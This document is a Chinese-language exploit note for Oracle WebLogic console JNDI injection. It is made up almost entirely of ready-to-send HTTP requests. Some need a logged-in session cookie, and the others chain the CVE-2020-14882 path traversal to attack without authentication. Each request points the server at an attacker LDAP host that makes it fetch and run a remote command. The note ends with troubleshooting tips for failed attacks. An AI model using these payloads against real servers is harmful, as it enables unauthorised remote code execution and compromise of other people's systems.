方法一 console.portal

在windows下的10.3.6版本 12.1.3.0 版本测试成功

下面的payload需要登录web后台获取cookie再进行攻击

  1. GET /console/console.portal?_nfpb=true&_pageLabel=EJBTestHomePage&EJBTestHomePagehandle=com.bea.console.handles.JndiContextHandle("ldap://192.168.145.172:1389/Basic/Command/dir;AdminServer")&returnTo=home HTTP/1.1
  2. Host: 192.168.145.169:7001
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Referer: http://192.168.145.156:7001/console/login/LoginForm.jsp
  8. Accept-Encoding: gzip, deflate
  9. Accept-Language: zh-CN,zh;q=0.9
  10. Cookie: ADMINCONSOLESESSION=1KjbhdvfqqyJzch6km6DxJpfnh8tZSTg4nSm5j6QqL2qLT9P14HC!1928727074
  11. Connection: close
以下是结合 CVE-2020-14882 漏洞进行利用,可直接未授权进行攻击 
  1. GET /console/images/%252e%252e/console.portal?_nfpb=true&_pageLabel=EJBTestHomePage&EJBTestHomePagehandle=com.bea.console.handles.JndiContextHandle("ldap://192.168.145.172:1389/Basic/Command/dir;AdminServer")&returnTo=home HTTP/1.1
  2. Host: 192.168.145.169:7001
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Connection: close

方法二 consolejndi.portal

注意 此payload的 **ldap** 中间有一个 分号 , 不能直接粘贴 ldap 的链接

同样的,该payload也需要登录控制台后进行攻击 
  1. GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.174;1:1088/Exploit;AdminServer%22) HTTP/1.1
  2. Host: 192.168.174.144:7001
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9
  8. Cookie: ADMINCONSOLESESSION=GZUoX_MV8_7OMiv-hhhzix8-zbfknZI4Prm_41N4vUPBEt1vP8mf!2017534379; Hm_lvt_eaa57ca47dacb4ad4f5a257001a3457c=1605675257,1605704689,1605871061,1606205262; JSESSIONID=6qYoDKwKLN2nLGhJiJ1CtcaxZ8ENfjTU7B2n0GmG5HTVDrJxPkg3!655738588
  9. Connection: close
结合14882漏洞 未授权访问进行攻击 
  1. GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.145;172:1389/Basic/Command/dir;AdminServer%22) HTTP/1.1
  2. Host: 192.168.145.146:7001
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9
  8. Connection: close
备注: 如果JNDI服务器收到了请求,却没有打成功,可能是对方服务器版本JDK过高导致的。 如果打了EXP完全没有反应,可能是服务器不出网导致的。